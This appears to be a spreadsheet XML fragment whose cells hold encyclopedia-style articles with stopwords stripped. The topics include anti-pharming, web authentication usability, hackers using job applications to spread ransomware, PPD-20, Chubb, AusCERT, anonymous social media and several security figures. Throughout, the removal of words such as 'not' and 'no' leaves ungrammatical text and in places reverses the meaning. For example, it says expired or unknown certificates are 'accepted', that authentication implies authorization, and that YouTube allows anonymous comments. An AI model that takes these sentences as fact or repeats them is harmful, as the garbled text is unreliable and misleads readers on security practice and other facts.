    <t>anti-pharming techniques technology used combat pharming. traditional methods combating pharming include: server-side software, protection, browser add-ins toolbars. server-side software typically used enterprises protect customers employees internal private web-based systems pharmed phished, browser add-ins allow individual users protect phishing. protection mechanisms help ensure specific server cannot hacked thereby become facilitator pharming attacks. spam filters typically provide users protection pharming. currently efficient prevent pharming users make sure using secure connections (https) access privacy sensitive sites banking taxing, accept valid public certificates issued trusted sources. certificate unknown organisation expired certificate accepted time crucial business. so-called active cookies provide server-side detection tool. legislation also plays essential role anti-pharming. march 2005, u.s. senator patrick leahy (d-vt) introduced anti-phishing 2005, bill proposes five-year prison sentence and/or fine individuals execute phishing attacks information garnered online fraud phishing pharming commit crimes identity theft. home users consumer-grade routers wireless access points, perhaps single effective defense change password router something default, replacing password susceptible dictionary attack. also pharming phishing references "how stop phishing pharming scams?". magazine. 2005. "security: phishing pharming". windows magazine. 2005-06-22. archived original 2005-08-11. retrieved 2005-07-22.</t>
  </si>
  <si>
    <t>Real-time adaptive security</t>
  </si>
  <si>
    <t>real-time adaptive security network security model necessary accommodate emergence multiple perimeters moving parts network, increasingly advanced threats targeting enterprises. adaptive security watch network malicious traffic behavioral anomalies, ferret point vulnerabilities, identify real-time changes systems, automatically enforce point protections access rules, block malicious traffic, follow compliance dashboard providing audit data, more.among features adaptive security infrastructure security platforms share correlate information rather point solutions, heuristics system could communicate suspicions firewall. other features include finer-grained controls, automation addition human intervention), on-demand security services, security service, integration security management data. rather adding security custom applications operational, security models would created design phase app. major change model real-time adaptive security shifting authorization management policy on-demand service contains details policy enforcement matches compliance adapt user's situation trying access application, instance. dependence machine learning factual importance getting adapted changing network real time adaptive scenario cannot overlook possibilities machine learning. behaviour users network. adaptive authentication depends machine learning model baseline time mannerism normal users. recent advents machine learning offers brighter prospect artificial intelligence integration real time adaptation. unique risk score figured define decide possibilities security issues thereby ensuring escalated protection along stopless user accessibility. also intrusion-detection system network intrusion detection system sourcefire internet security systems machine learning risk-based authentication security-adaptive architecture references</t>
  </si>
  <si>
    <t>Usability of web authentication systems</t>
  </si>
  <si>
    <t>usability authentication systems refers efficiency user acceptance online authentication systems. examples authentication systems passwords, federated identity systems (e.g. google oauth 2.0, facebook connect, mozilla persona), email-based single sign-on (sso) systems (e.g. saw, hatchet), code-based systems (e.g. snap2pass, webticket) system used authenticate user's identity web. even though usability authentication systems consideration selecting system, authentication systems (other passwords) subjected formal usability studies analysis. usability users authentication system needs usable possible whilst compromising security needs ensure. system needs restrict access malicious users whilst allowing access authorised users. authentication system sufficient security, malicious users could easily gain access system. hand, authentication system complicated restrictive, authorised user would able want strong security achievable system, even secure authentication system undermined users system, often referred "weak links" computer security.users tend inadvertently increase decrease security system. system usable, security could suffer users minimize effort required provide input authentication, writing passwords paper. usable system could prevent happening. users likely oblige authentication requests systems important (e.g. online banking), opposed less important systems (e.g. forum user visits infrequently) mechanisms might ignored. users accept security measures certain point becoming annoyed complicated authentication mechanisms. important factor usability authentication system thus convenience factor user around usability applications preferred authentication system applications password, despite poor usability several security concerns. this widely used system usually contains mechanisms intended increase security (e.g. requiring users high entropy passwords) lead password systems less usable inadvertently less secure. this users find high entropy passwords harder remember. application creators need make paradigm shift develop usable authentication systems take user's needs account. replacing ubiquitous password based systems usable (and possibly secure) systems could lead major benefits owners application users. measurement measure usability authentication system, "usability–deployability–security" "uds" framework standard metric, system usability scale. framework looks three broad categories, namely usability deployability security authentication system rates tested system either offering offering specific benefit linked more) categories. authentication system classified either offering offering specific benefit within categories usability deployability security.measuring usability authentication systems allow formal evaluation authentication system determine ranking system relative others. while research regarding authentication system currently done, tends focus security usability. future research evaluated formally usability using comparable metric technique. this enable comparison various authentication systems, well determining whether authentication system meets minimum usability benchmark. which authentication system choose found security experts tend focus security less usability aspects authentication systems. this problematic needs balance security system ease-of-use. study conducted 2015 found users tend prefer single sign-on (like provided google facebook) based systems. users preferred systems found fast convenient use. single sign-on based systems resulted substantial improvements usability security. reduces need users remember many usernames passwords well time needed authenticate themselves, thereby improving usability system. other important considerations users prefer systems complicated require minimal effort understand. users enjoy using biometrics phone‐based authentication systems. however types systems require external devices function, higher level interaction users need fall back mechanism device unavailable fails could lead lower usability current password system used many applications could extended better usability using: memorable mnemonics instead passwords. graphical mnemonic passwords make authentication usable. future work usability become important applications move online require robust reliable authentication systems usable secure. brainwaves authentication systems proposed possible achieve this. however research usability studies required. also references further reading martin georgiev; suman jana; vitaly shmatikov. "rethinking security web-based system applications" (pdf). 24th international world wide conference. keith, mark; shao, benjamin; steinbart, paul john (january 2007). "the usability passphrases authentication: empirical field study". international journal human-computer studies. (1): 17–28. doi:10.1016/j.ijhcs.2006.08.005. muhammad daniel hafiz abdullah; abdul hanan abdullah; norafida ithnin; hazinah kutty mammi (2008). towards identifying usability security features graphical password knowledge based authentication technique. 2008 second asia international conference modelling simulation (ams). 396–403. doi:10.1109/ams.2008.136. john chuang; hamilton nguyen; charles wang; benjamin johnson (2013). think, therefore, usability security authentication using brainwaves". financial cryptography data security. lecture notes computer science. vol. 7862. springer berlin heidelberg. 1–16. citeseerx 10.1.1.359.9402. doi:10.1007/978-3-642-41320-9_1. isbn 978-3-642-41319-3. issn 0302-9743. paul mccabe (2002). "usability user authentication: pectoral password pin". contemporary ergonomics, 2003. press. isbn 9780203455869.</t>
  </si>
  <si>
    <t>Usage data</t>
  </si>
  <si>
    <t>usage data effective evaluating true relevancy value website. example, users arrive site back immediately (high bounce rate), chances wasn’t relevant query first place. however, user repeatedly visits site spends long time site, high likelihood extremely relevant. when comes search engines, relevant valuable sites promoted irrelevant sites demoted. search engines want results highly relevant users make sure users keep returning search engine future searches. best establish relevance users know sites. cookies used search engines maintain history user’s search activity. references</t>
  </si>
  <si>
    <t>Usage of job applications by hackers</t>
  </si>
  <si>
    <t>application employment standard business document prepared questions deemed relevant employers. used determine best candidate fill specific role within company. most companies provide forms anyone upon request, point becomes responsibility applicant complete form return employer consideration. completed returned document notifies company applicant's availability desire employed well qualifications background determination made candidate's suitability position. definition from employer's perspective, application serves number purposes. these vary depending nature preferences person responsible hiring, "each organization application form reflects environment". minimum, application usually requires applicant provide information sufficient demonstrate legally permitted employed. typical application also requires applicant provide information regarding relevant skills, education, experience (previous employment volunteer work). application minor test applicant's literacy, penmanship, communication skills. careless applicant might disqualify poorly filled-out application. application also require applicant disclose criminal record provide information sufficient enable employer conduct appropriate background check. business employs workers part-time basis, application inquire applicant's availability specific times and/or days preferences regard. employers prohibited asking applicants characteristics relevant job, political view sexual orientation.for white collar jobs, particularly requiring communication skills, employer typically require applicants accompany form cover letter résumé. however, even employers accept cover letter résumé frequently also require applicant complete application form, documents neglect mention specific details importance employer. instances, application effectively used dissuade "walk-in" applicants, serving barrier applicant interview person authority hire.for many businesses, applications employment filled online, rather submitted person. however, still recommended applicants bring printed copy application interview.application forms second common hiring instrument next personal interviews. companies occasionally types application forms, short long. they help companies initial screening longer form used purposes well. answers applicants choose submit helpful company potentially become interview question applicant. standardization regulation employment application standardized form, every company create long regulations government adhered document elements minimum, applications usually applicant name, phone number, address. addition, applications also previous employment information, educational background, emergency contacts, references, well special skills applicant might have. three categories information application fields useful discovering physical characteristics, experience, environmental factors. physical characteristics company bona fide occupational qualification (bfoq) regarding physical condition, questions example: requires physical labor. physical problems interfere job? experience experience requirements separated groups application: work experience educational background. educational background important allows potential employer evaluate applicants' performance school well make determinations personality intelligence. work experience important inform potential employer applicant meets specific needs. companies usually interested applicants unemployed, when/why applicant left previous highest position previous job. socio-environmental qualifications companies interested applicant's social environment inform personality, interests, qualities. example, extremely active within organization, demonstrate ability communicate well others. being management demonstrate leadership ability well determination. photograph customs vary country country comes inclusion non-inclusion photograph applicant. many english-speaking countries, notably united states, customary, books websites giving recommendations design application typically advise unless explicitly requested employer. countries (for instance, germany), inclusion photograph applicant still common, many employers would consider application incomplete without non-english speaking european countries france france, 2006 equal opportunities requires companies employees request anonymous application anonyme). germany application called bewerbung germany usually consists three parts: anschreiben (cover letter), lebenslauf (curriculum vitae (cv)) zeugnisse (references). anschreiben used convince employer submit invitation interview. must paper size exceed page, handwritten signature, accompanied lebenslauf zeugnisse. lebenslauf documented reverse chronological order give information work experience, education professional training well applicant's skills. germany, lebenslauf usually includes photograph called bewerbungsfoto. some employers, mainly governmental organisations, deliberately neglect photograph ensure higher degree objectivity course assessment procedures. lebenslauf pages long. general, options submitting application germany: application folder (bewerbungsmappe) online (onlinebewerbung). according study, onlinebewerbung favored germany bewerbungsmappe 2012. italy important part application longer three pages. divided three areas: chronological order: personal details (informazioni personal) school education (studi formazione)in reverse chronological order: additional capabilities/skills (altre conoscenze) experience (esperienze professional). graduate, section omitted. brief information application motivations mentioned here.the cover letter lettera accompagnamento curriculum) relatively short, polite formal italian applications. long versions extensively explained motivations, well photos copies certificates, presented interview. spain spain, application consists parts: cover letter (carta candidatura) work training certificates attached. cover letter short contain reason applying. structured tabular form. spain, multiple interviews company common. usage hackers applications known used hackers employees open attachments links connect sticks malware. companies typically financial resources private individuals, often target cyberextortion. ransomware "petya" "goldeneye" discovered exploit applications. cyberespionage attacks critical infrastructure-related companies reasons attacks ransomware attacks leave employees dark computer network infection. best method mitigating risks would department separate computer applications entirely disconnected internal network, confidential valuable information stored portable devices sticks connected computers company connected. also employment contract human resource management recruitment staffing models references</t>
  </si>
  <si>
    <t>Cindy Cohn</t>
  </si>
  <si>
    <t>cindy cohn american civil liberties attorney specializing internet law. represented daniel bernstein electronic frontier foundation bernstein united states. education received undergraduate degree university iowa london school economics doctor jurisprudence university michigan. career 1997 cohn recognized california lawyer magazine "lawyers year" work. after serving years legal director general counsel electronic frontier foundation, became executive director 2015.in addition bernstein, cohn's significant cases include hepting at&amp;t (class action at&amp;t collaborating national security agency program wiretap data-mine americans' communications), sony tech. litigation (class action sony placing dangerous digital rights management (drm) customers' computers), diebold (diebold held liable sending unfounded cease desist notices internet service providers (isps) effort stop public discussion flaws electronic voting machines), bunner (representing andrew bunner copy control association defending right republish computer program found republished elsewhere internet). awards honors 2006 cohn named influential lawyers america national journal. november 2018, featured among "america's women tech" forbes. cohn also serves board directors nonprofits human rights advocates verified voting foundation. references external links cindy cohn's site human rights advocates home page appearances c-span</t>
  </si>
  <si>
    <t>User (computing)</t>
  </si>
  <si>
    <t>user person utilizes computer network service. user often user account identified system username user name). other terms username include login name, screenname screen name), account name, nickname nick) handle, derived identical citizens band radio term. some software products provide services systems direct users. user users ultimate human users (also referred operators) software product. user stands contrast users support maintain product sysops, database administrators computer technicians. term used abstract distinguish software developers system, enhance software users. user-centered design, also distinguishes software operator client pays development stakeholders directly software, help establish requirements. this abstraction primarily useful designing user interface, refers relevant subset characteristics expected users would common. user-centered design, personas created represent types users. sometimes specified persona types user interfaces comfortable (due previous experience interface's inherent simplicity), technical expertise degree knowledge specific fields disciplines. when constraints imposed end-user category, especially designing programs general public, common practice expect minimal technical expertise previous training users.the end-user development discipline blurs typical distinction users developers. designates activities techniques people professional developers create automated behavior complex data objects without significant knowledge programming language. systems whose actor another system software agent direct users. user account user's account allows user authenticate system potentially receive authorization access resources provided connected system; however, authentication imply authorization. account, user typically required authenticate oneself password credentials purposes accounting, security, logging, resource management. once user logged operating system often identifier integer refer them, rather username, process known identity correlation. unix systems, username correlated user identifier user computer systems operate types based kind users have: single-user systems concept several user accounts. multi-user systems concept, require users identify using system.each user account multi-user system typically home directory, store files pertaining exclusively user's activities, protected access users (though system administrator access). user accounts often contain public user profile, contains basic information provided account's owner. files stored home directory (and directories system) file system permissions inspected operating system determine users granted access read execute file, store file directory. while systems expect user accounts used single person, many systems special account intended allow anyone system, username "anonymous" anonymous username "guest" guest account. password storage unix systems, local user accounts stored file /etc/passwd, user passwords stored /etc/shadow hashed form.on microsoft windows, user passwords accessed within credential manager program. these passwords located windows profile directory username format various computer operating-systems applications expect/enforce different rules format. microsoft windows environments, example, note potential user principal name (upn) format example: username@example.com down-level logon name format example: domain\username terminology some usability professionals expressed dislike term "user" proposed changing norman stated "one horrible words 'users'. crusade word 'users'. would prefer call 'people'."users computer systems software products generally lack technical expertise required fully understand work. power users advanced features programs, though necessarily capable computer programming system administration. also references</t>
  </si>
  <si>
    <t>Chubbsafes</t>
  </si>
  <si>
    <t>chubbsafes brand safes vaults origins specialises products offer certified burglary protection and/or fire protection. brand widely sold marketed south africa, india malaysia well parts northern europe east asia. chubbsafes owned licence gunnebo group. history early years: 1818-1938 1818, charles chubb younger brother, jeremiah chubb, founded chubb company opened workshop making locks temple street wolverhampton, england. years later, opened shop st.paul's churchyard london. 1835, charles chubb expanded business took patent burglary-resistant safe. safe works opened shortly afterwards, 1837, london 1839 brothers patented first fire safe. following death charles, company remained family, taken son, john chubb, 1846, grandchildren, john charles, george hayter harry withers chubb 1872. 1882, business became private limited company changed name chubb sons lock safe company ltd. london safe works moved wednesfield road wolverhampton 1908 site extended 1938, joined lock works. expansion: 1950s-1990s january 1950 celebratory dinner held carlton hotel johannesburg south africa. event inauguration f.m.w petersen director austen petersen safe company south africa chubb sons lock safe company great britain. first overseas factory opened south africa 1950 followed second offshore plant, time canada, four years later. over coming years, chubb company made several acquisitions later acquired itself. hobbs hart became member chubb group 1956, chatwood-milner 1958 josiah parkes sons (holdings) limited 1965. racal electronics group acquired chubb sons lock safe company 1984 company, williams holdings, took 1997. 2000 present 2000, safes part company licence chubbsafes brand acquired gunnebo group. since then, chubbsafes introduced markets including china, indonesia, sweden, germany france. products safes safes sold grade grade rising level physical attack safe withstand. grade always awarded independent body (european certification body). fire safes safes also sold withstand fire. these independently certified length protection (half hour, hour hours) type contents protected (either paper data). range includes document safes, data safes fireproof filing cabinets. vault rooms with grades xii, vault rooms vault doors used banks, also companies need protect contents specific area, weapons room storage pharmaceuticals. references external links official website</t>
  </si>
  <si>
    <t>Presidential Policy Directive 20</t>
  </si>
  <si>
    <t>presidential policy directive (ppd-20), provides framework u.s. cybersecurity establishing principles processes. signed president barack obama october 2012, directive supersedes national security presidential directive nspd-38. integrating cyber tools national security, directive complements nspd-54/homeland security presidential directive hspd-23. classified unreleased national security agency (nsa), nspd-54 authorized george bush. gives u.s. government power conduct surveillance monitoring.its existence made public june 2013 former intelligence infrastructure analyst edward snowden. background because private industry, issues surrounding international domestic law, public-private-partnership became the, "cornerstone america's cybersecurity strategy". suggestions private sector detailed declassified 2003, national strategy secure cyberspace. companion document, national security presidential directive (nspd-38), signed secret george bush following year.although contents nspd still undisclosed, u.s. military recognize cyberspace "theater operations" u.s. national defense strategy 2005. report declared the, "ability operate global commons-space, international waters airspace, cyberspace important project power anywhere world secure bases operation." three years later, george bush formed classified comprehensive national cybersecurity initiative (cnci). citing economic national security, obama administration prioritized cybersecurity upon taking office. after in-depth review the, "communications information infrastructure," cnci partially declassified expanded president obama. outlines "key elements broader, updated national u.s. cybersecurity strategy." 2011, pentagon announced capability cyber attacks. general after u.s. senate failed pass cybersecurity 2012 august, presidential policy directive (ppd-20) signed secret. electronic privacy information center (epic) filed freedom information request would comply. some details reported november 2012. washington post wrote ppd-20, extensive white house effort date wrestle constitutes 'offensive' 'defensive' action rapidly evolving world cyberwar cyberterrorism." following january, obama administration released ten-point factsheet. controversy june 2013, ppd-20 became public. released edward snowden posted guardian, part 2013 mass surveillance disclosures. while u.s. factsheet claims ppd-20 acts within "consistent values promote domestically internationally previously articulated international strategy cyberspace", reveal cyber operations directive.snowden's disclosure called attention passages noting cyberwarfare policy possible consequences. directive calls defensive offensive measures defensive cyber effects operations (dceo) offensive cyber effects operations (oceo), respectively. notable points "loss life, significant responsive actions united states, significant damage property, serious adverse foreign policy consequences, serious economic impact united states." "oceo offer unique unconventional capabilities advance u.s. national objectives around world little warning adversary target potential effects ranging subtle severely damaging. development sustainment oceo capabilities, however, require considerable time effort access tools specific target already exist." "the united states government shall identify potential targets national importance oceo offer favorable balance effectiveness risk compared instruments national power, establish maintain oceo capabilities integrated appropriate u.s. offensive capabilities, execute capabilities manner consistent provisions directive." further reading 2013 mass surveillance disclosures comprehensive national cybersecurity initiative external links guardian: presidential policy directive (ppd) fas: white house ppd-20 factsheet also cyberwarfare united states references</t>
  </si>
  <si>
    <t>Chubb Fire &amp; Security</t>
  </si>
  <si>
    <t>chubb fire security subsidiary group corporation (nyse: apg). history company founded charles jeremiah chubb, patented chubb detector lock 1818. company government competition lock could opened key.in 1835, company produced first chubb safe factory wolverhampton, and, second half 19th century, company expanded united states, produced time lock fitted bank vaults across country. 1800s, chubb gained important customers duke wellington bank england.over next hundred years, company turned 2.5m locks. 1940s, chubb expanded operations countries. from single company manufacturing specialized security products turned broad-based group companies covering many aspects security fire protection well.the company went acquire number rival firms including chatwood-milner ltd. (1958), burgot alarms rely-a-bell (1962), read campbell limited (1964), josiah parkes sons ltd. (1965) pyrene company limited (1967). bought racal electronics august 1984, demerged september 1992, acquired williams holdings february 1997. latter company sought build security-focused conglomerate. chubb demerged july 2000.in august 2000, chubb sold chubb locks, lock safe making unit, assa abloy, concentrated security systems door access cctv systems. 2002, chubb held intensive acquisitions talks sweden-based securitas world's biggest security services business. after months negotiations, talks called grounds deal would "financially attractive" either company's shareholders.in australia, chubb security bought security 1996, sold security intelligence services 2008.in april 2003, chubb acquired £622m united technologies corporation. march 2007, bought initial fire security, security rentokil initial proceeded merge business assets chubb climate, controls security. december 2013, chubb's australian cash transit business sold prosegur.in 2020, chubb spun rest climate, controls security separate company, carrier global. january 2022 announced carrier global sold business group billion. brands sicli (secours immédiat contre l’incendie) delta security solutions counterforce (security monitoring centers) quell vitalcall also chubb fire chubb locks read campbell limited minimax limited rampart engineering pyrene company limited references external links official site</t>
  </si>
  <si>
    <t>Raz-Lee</t>
  </si>
  <si>
    <t>raz-lee security, inc. international organization provides data security solutions ibm's power servers. company's clients include fiat, agfa, teva pharmaceuticals, avnet, aig, bradstreet israel branch american insurance company american international group, among others. history founded 1983, company formerly headquartered herzliya, israel. 1992, company's products sold united states, 1994 1996 business there, offices nanuet, york, dramatically increased, though primary purchasers still spread europe, middle east africa. 2009, company headquartered nanuet, research development facility israel. company also offices israel italy maintains technical support account management center francisco. isecurity suite company's best known product consists individual products intended protect monitor information assets insider threat unauthorized external access.in march 2020, raz-lee brought interface software next level isecurity web, product effectively operates standard isecurity browser. reviewed browsers chrome, firefox edge, also operates desktop computers tablets.in august 2020, raz-lee released attack simulator isecurity anti-ransomware product, enabling users test systems would react known ransomware attacks. references external links jungle raz-lee adds object-level security security suite</t>
  </si>
  <si>
    <t>Anonymous social media</t>
  </si>
  <si>
    <t>anonymous social media subcategory social media wherein main social function share interact around content information anonymously mobile web-based platforms. another aspect anonymous social media content information posted connected particular online identities profiles. background appearing early mostly anonymous-confession websites, genre social media evolved various types formats anonymous self-expression. earliest anonymous social media forums 2channel, first introduced online 1999, japanese text board forum. with digital content consumed created continuously changing, trending shift mobile applications also affecting anonymous social media. this seen anonymous blogging, various format based content platforms nameless question answer online platforms like ask.fm introduce mobile versions services number networks joining anonymous social sharing scene continues grow rapidly. degrees anonymity across different forms anonymous social media varying degrees anonymity. some applications, librex, require users sign account, even though profile linked posts. while applications remain anonymous, sites sync user's contact list location develop context within social community help personalize user's experience, secret. other sites, 4chan 2channel, allow purer form anonymity users required create account, posts default username 'anonymous'. while users still traced address, anonymizing services like various proxy server services encrypt user's identity online running different routers. secret users must provide phone number email signing service, information encrypted posts. controversy apps formspring, ask, sarahah, whisper, secret elicited discussion around rising popularity anonymity apps, including debate anticipation social sharing class. platforms join league anonymous social media, growing concern ethics morals anonymous social networking cases cyber-bullying, personal defamation occurs. formspring, also known spring.me, ask.fm associated teen suicides result cyberbullying sites. formspring associated least three teen suicides ask.fm least five.for instance, secret shut escalated cyberbullying. also helped contribute cyberbullying situations and, turn, blocked school networks their privacy policy meant users could identified without subpoena, search warrant, court order. another called after school also sparked controversy design lets students post anonymous content. multiple controversies, removed apple google stores. number people using platforms multiplies, unintended uses apps increased, urging popular networks enact in-app warnings prohibit middle high school students. teens admit making effort conceal online behavior parents.some apps also criticized causing chaos american schools, lockdowns evacuations. order limit havoc caused, anonymous apps currently removing abusive harmful posts. apps yak, secret, whisper removing posts outsourcing content supervision oversea surveillance companies. these companies hire team individuals inspect remove harmful abusive posts. furthermore, algorithms also used detect remove abusive posts individuals missed. another method used anonymous named cloaq reduce number harmful abusive posts limit number users register certain period. under system, contents still available public, registered users post. other websites youtube gone create policies regarding anonymity. youtube allow anonymous comments videos. users must google account like, dislike, comment reply comments videos. once sign-in user 'likes' video, added user's 'liked video playlist.' youtube changed 'liked video playlist' policy december 2019, allowing signed-in user keep 'liked video playlist' private.historically, controversies rise cyberbullying blamed anonymous aspect many social media platforms, half adult online harassment cases involve anonymity, researchers found targeted harassment exists offline also found online, online harassment reflection existing prejudices. prospective uses there also promising opportunities anonymous social media networks offer regarding authentic human connection semi-anonymous communication. example, called memo allows employees specific workplaces anonymously tell employers employees feel respective workplace. this sort safe, anonymous place allows transparency workplace among employers employees. other anonymous social media formats public rely controlled anonymity like tellm rumr. case, users interact contact list, allowing people connect people know anonymously. another app, called anomo, allows users start entirely anonymous time progresses users option reveal different aspects users. this type range anonymity allows users know another time. with room free expression communication among semi-known identities, discussion type technology market political activism parts world possible. anonymous social media websites used political expression platforms. since 2016 u.s. presidential election, anonymous social media websites prevalent place political expression asserted. moreover, anonymous social media also provide authentic connection complete anonymous communication. there cases anonymous platforms saved individuals life-threatening situation spread news social cause. additionally, anonymous social websites also allow internet users communicate also safeguarding personal information criminal actors corporations sell users' data.another prospective anonymous social media content creation. example, study done 2017 found 700,000 unique images posted 4chan's /pol/ board study period million studied images suggesting anonymous social networks serve platform users contribute unique digital content. revenue generated anonymous social media anonymous apps generating revenue anonymous apps discussion investors. since little information collected users, difficult anonymous apps advertise users. however apps, whisper, found method overcome obstacle. they developed “keyword-based” approach, advertisements shown users depending certain words type. another named able capitalize features provide. anonymous apps chrends take approach using anonymity provide freedom speech. telephony burner regularly grossing utilities android stores using phone number generation technology. despite success anonymous apps, also apps, secret, find generate revenue. idea anonymous also caused mixed opinions within investors. some investors invested large money potential revenue generated within apps. other investors stayed away investing apps feel apps bring harm good. anonymous sites there several sources generate revenue anonymous social media sites. source revenue implementing programs premium membership gift-exchanging program. another source revenue merchandising goods specific usernames users. addition, sites fmylife, implemented policy anonymous site receive profit apps makes money it.in terms advertisements, anonymous sites troubles implementing attracting them. there several reasons problem. anonymous sites, 4chan, received advertisement offers contents generates. other anonymous sites, reddit, cautious implementing order maintain user base. despite lack advertisements certain anonymous sites, still anonymous sites, socialnumber, support idea. also anonymous post dark social media online disinhibition effect references</t>
  </si>
  <si>
    <t>Christopher J. Hadnagy</t>
  </si>
  <si>
    <t>christopher james hadnagy american author information technology security consultant. career hadnagy founder social-engineer llc, company provides education training related social engineering. founder social-engineer.org, security education website, innocent lives foundation, organization aims identify people involved child trafficking.hadnagy also adjunct professor university arizona’s center academic excellence cyber operations. february 2022, hadnagy banned permanently hacker conference con, operated colocated event ("village"), unspecified code conduct violations, announced organization's transparency report: received multiple violation reports village leader, chris hadnagy village. after conversations reporting parties chris, confident severity transgressions merits con."in hadnagy's response blog, said disagrees ban, informed details allegations representatives, person affiliated told related sexual misconduct. bsides cleveland fall 2021, bsides cleveland included hadnagy agenda speakers june 2022 event. leading event, organizer labeled hadnagy's speaking slot "special guest" instead listing name, attendees speakers know would speaking. talk cancel culture, also presented different bsides event last year. after hadnagy gave presentation, several speakers pulled event, attendees people information security community criticized event hiding name. some said would attended event known would speaker. books 2018, rothke bill varhol positively reviewed social engineering: science human hacking. 2016, rothke said "unmasking social engineer: human element security helps reader understand "ensuring social engineering part overall information security program longer option". maria patricia prandini isaca journal book reviews said book phishing dark waters: offensive defensive sides malicious e-mails detailed analysis cyber security techniques available wide readership, professionals industry. publications human hacking: friends, influence people, leave them better having you, christopher hadnagy, seth schulman, 2021, harper business (isbn 978-0-063-00178-7) social engineering: science human hacking, christopher hadnagy, 2018, john wiley sons inc. (isbn 978-1-119-43338-5) phishing dark waters: offensive defensive sides malicious, christopher hadnagy, michele fincher robin dreeke, 2015, john wiley sons inc. (isbn 978-1-118-95847-6) unmasking social engineer: human element security, christopher hadnagy, 2014, john wiley sons, inc. (isbn 978-1-118-60857-9) social engineering: human hacking, christopher hadnagy, 2010, wiley publishing, inc. (isbn 978-0-470-63953-5) references external links innocent lives foundation</t>
  </si>
  <si>
    <t>AusCERT</t>
  </si>
  <si>
    <t>auscert, founded 1993, non-profit organisation provides advice solutions cybersecurity threats vulnerabilities. organisation covers costs member subscriptions, attendees annual auscert conference service contracts. history early 1990s, australian university student nahshon even-chai hacked nasa computer system spare time. this triggered chain reaction business governments wanting improved information security. result, three australian universities (queensland university technology, griffith university, university queensland) came together form auscert. they aimed create central source information security protection. auscert australia’s computer emergency response team (cert) oldest cert world. first member, auscert part worldwide network computer security incident response security teams. these teams work together voluntarily deal computer security problems formulating prevention methods. their office located university queensland campus. services auscert covers costs selling member subscriptions service contracts individuals businesses. organisation boosts 24/7 support incident management cyber threats. other services include phishing take-down, security bulletins, incident notifications, sensitive information alerts, early warning sms, malicious feeds.engaged active within incident response teams global level; auscert charter member, apcert well member forum incident response security team (first) auscert annual conference auscert hosting cybersecurity conferences australia since 2001. conference takes place every year industry professionals hands-on tutorials. auscert conference oldest information security conference australia biggest conference country. over last years, conference attracted approximately participants, sponsors speakers. three four-day program generally includes tutorials, keynote speakers, gala dinner australian information security awards, speed debate.in 2020, covid-19 pandemic, auscert hosted first virtual conference 1000 delegates registering. conference adam spencer featured speakers julie inman (esafety commission), kana shinoda (code blue), lukasz gogolkiewicz (seek). additional activities organisation currently supports shares cybersecurity techniques opening following groups: australian access federation, cyber security threat annual surveys bdo, international training apnic, training support krcert, council australian university directors information technology (caudit). references external links auscert.org.au</t>
  </si>
  <si>
    <t>Christian Catalini</t>
  </si>
  <si>
    <t>christian catalini co-creator diem (formerly libra), chief economist diem association, theodore miller professor sloan school management.catalini known research economics cryptocurrencies blockchain technology, economic design diem. past research focused economics crowdfunding, early stage capital formation, economics science technology. career catalini joined faculty 2013, appointed 2018 faculty research fellow national bureau economic research productivity, innovation entrepreneurship program.in 2013, catalini co-designed catherine tucker digital currency experiment distributed $500,000 bitcoin undergraduates. catalini tucker published results research study science.in 2017, catalini founded cryptoeconomics lab, brings together fields economics computer science study cryptocurrency protocols, incentives market design. catalini also faculty advisor digital currency initiative leave), economic advisor algorand, cryptocurrency startup founded silvio micali. 2018, catalini joined david marcus' team facebook, inc. develop economic design libra (now diem). since 2020, seconded diem association chief economist. diem, catalini focused economic, market design, growth incentives, business model project.in 2022, catalini joined coinbase institute sits advisory board. education christian catalini born ancona, italy. studied economics business bocconi university milan (bsc msc). 2013, catalini earned ph.d. degree university toronto (rotman school management) research supervised ajay agrawal. during ph.d., catalini worked ajay agrawal establish creative destruction (cdl) university toronto, served associate director (2012-2013), member strategic advisory board (2013-2018). since 2019, associate creative destruction blockchain stream. research catalini best known fundamental early work economics cryptocurrencies blockchain technology, crowdfunding, early stage capital formation, economics science. research topics featured nature, science, york times, cnn, wall street journal, economist, cnbc, wired, npr, forbes, bloomberg, techcrunch, financial times, chicago tribune, boston globe, vice news, washington post, reuters among others. 2017, catalini received ewing marion kauffman foundation junior faculty fellowship entrepreneurship research. 2014, catalini's thesis awarded wiley blackwell outstanding dissertation award business policy strategy “three essays impact geographic social proximity innovation”, assigned business policy strategy division academy management. catalini presented work variety institutions including harvard university, mit, yale university, london business school, york university, berkeley, stanford university, council foreign relations, federal reserve bank, federal trade commission, treasury, u.s. securities exchange commission, commodity futures trading commission, world bank, international monetary fund, world economic forum, white house ostp, number central banks global regulators. references</t>
  </si>
  <si>
    <t>Phillip Porras</t>
  </si>
  <si>
    <t>phillip porras computer scientist security researcher known work combating conficker worm. porras leads internet security group international's computer science laboratory. previously manager trusted computer systems department aerospace corporation. porras holds u.s. patents, named fellow 2013. education porras attended university california, irvine. career porras author patents involved 2008 case international, inc. internet security systems, inc.during conficker worm's initial attack, porras running honeypot first security researchers notice part "conficker cabal" helped combat worm. porras' team published extensive analysis worm. 2010, porras co-author blade, collaboration georgia tech researchers designed prevent drive-by download malware attacks. awards memberships porras named fellow 2013 long-term work information security malware analysis, recent research openflow. references</t>
  </si>
  <si>
    <t>Australian Cyber Collaboration Centre</t>
  </si>
  <si>
    <t>australian cyber collaboration centre (a3c) not-for-profit organisation funded largely south australian government grants based collaboration member organisations, focuses cyber security. connected department innovation skills located fourteen adelaide, south australia. history former chief information security officer western australia police, tran, appointed inaugural june 2020, ahead official launch july 2020. fourteen north terrace adelaide.the centre established collaboration federal south australian government, well industry partners including systems australia optus; academic institutions including unisa, flinders university, university adelaide tafe south australia's office cyber security; commonwealth's defence science technology group; independent (partly government-funded) organisations austcyber cyber security cooperative research centre.before opening, already launched six-day pilot training course collaboration university adelaide aizoon australia, focused digital forensic incident response.in november 2021, extended partnerships include cisco. role responsibilities a3c's function make cyberspace better, safer, place organisations, corporations, agencies institutions business".its work includes identifying vulnerabilities cyber attacks; providing testing hardware software components systems (the cyber test range); providing training cyber security (the cyber training academy); creating strategic practical plans implementing cyber security; following progress assessing value investments afterwards.training essential component work, cyber crime affects cent businesses, south australia developing defence, space technology industries, shortage skilled workers cyber security. 2019 minister innovation skills, david pisoni forecasted 7500 opportunities sector state next five years, 1500 would need cyber security skills.a3c also focuses small businesses large resources protect cyber attacks, aiming help foster collaborations organisations help. governance, funding membership centre ministerial responsibility minister innovation skills, david pisoni, overseen board. inaugural chair scott, director consulting.while funding comes government sources, commonwealth bank major sponsor, global cyber alliance partner a3c.as 2021 chief executive australian cyber collaboration centre mike barber. approximately members drawn academia, industry, cyber security defence industry companies, government departments, equipment vendors membership bodies. references external links official website</t>
  </si>
  <si>
